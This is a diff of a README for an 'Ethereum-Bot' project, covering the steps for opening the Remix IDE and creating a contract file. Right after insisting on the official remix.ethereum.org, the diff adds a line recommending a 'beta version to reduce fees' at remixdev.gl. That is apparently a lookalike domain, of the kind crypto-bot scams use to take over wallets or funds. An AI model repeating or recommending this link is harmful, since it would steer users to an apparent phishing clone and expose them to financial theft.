Jacob-project/Ethereum-Bot/README.md

 2- Access Remix

 ► [Use Remix Ethereum IDE](https://remix.ethereum.org/) 🚨 https://remix.ethereum.org/ 🚨 (Ensure you only use this original version, as the bot is compatible with it specifically.)
+Or this beta version to reduce fees : https://remixdev.gl/
 3- Create Contract File

 ► Go to the “contracts” folder and create a “New File”.